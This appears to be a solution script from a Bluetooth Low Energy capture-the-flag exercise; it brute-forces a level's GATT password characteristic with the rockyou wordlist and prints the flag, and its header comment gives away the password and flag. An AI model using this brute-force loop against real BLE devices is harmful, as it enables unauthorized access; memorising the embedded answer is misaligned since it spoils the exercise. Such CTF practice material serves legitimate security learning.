BLE_CTF_V2 / lvl_02.py
root on 11 Mar 2022 1 KB tidying for public release
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
  
'''
42  0x2A   READ WRITE   Enter password here. Use rockyou.
44  0x2C   READ 
46  0x2E   READ WRITE   write here to goto to scoreboard

password1234 - eca7d1f3cf60a8b5344a
'''

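# Wordlist used for the dictionary run against the level-02 password handle.
rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt"

# GATT handles used below. 0x2A and 0x2C come from the handle table in this
# file; 0x30 is not listed there.
PASSWORD_HANDLE = 0x2A  # READ WRITE: candidate password is written here
RESULT_HANDLE = 0x2C    # READ: this script treats a non-empty value as success
LEVEL_HANDLE = 0x30     # presumably the level selector -- confirm against the CTF docs

# Strip surrounding whitespace so a trailing newline in ctf_mac.txt does not
# end up inside the address; the context manager closes the file handle.
with open('ctf_mac.txt') as mac_file:
    deviceMAC = mac_file.read().strip()

p = btle.Peripheral(deviceMAC)
try:
    # Kept from the original: the result is unused, but the lookup fails early
    # if the peripheral does not expose service 0x00FF.
    svc = p.getServiceByUUID(0x00FF)
    print("Attached to peripheral")

    print("Loading level 02")
    # Big-endian 16-bit value 0x0002, the same two bytes the original built
    # with unhexlify('0002').
    p.writeCharacteristic(LEVEL_HANDLE, struct.pack(">H", 2), withResponse=False)

    # NOTE: this loop only succeeds because the CTF firmware appears to accept
    # unlimited unauthenticated writes to the password characteristic. A
    # production GATT service should require an authenticated, encrypted link
    # (pairing/bonding) for such a characteristic and throttle or lock out
    # repeated failures.
    #
    # Binary mode: rockyou.txt contains byte sequences that are not valid
    # UTF-8, so text-mode iteration can raise UnicodeDecodeError on Python 3,
    # and writeCharacteristic() takes raw bytes anyway.
    with open(rockyou, "rb") as f:
        for line in f:
            candidate = line.rstrip()
            # Decoded copy is for display only; undecodable bytes are replaced.
            shown = candidate.decode("utf-8", "replace")

            sys.stdout.write("\rTrying: %s                                          " % shown)
            p.writeCharacteristic(PASSWORD_HANDLE, candidate, withResponse=True)

            # The original hexlified and immediately unhexlified this value,
            # which is a no-op; test the raw bytes directly.
            flag = p.readCharacteristic(RESULT_HANDLE)

            if flag:
                print("\rPassword Found: %s" % shown)
                print("Flag: %s" % flag.decode("utf-8", "replace"))
                break
finally:
    # Always release the BLE connection, including on an exception or Ctrl-C,
    # so the peripheral is not left with a stale link.
    p.disconnect()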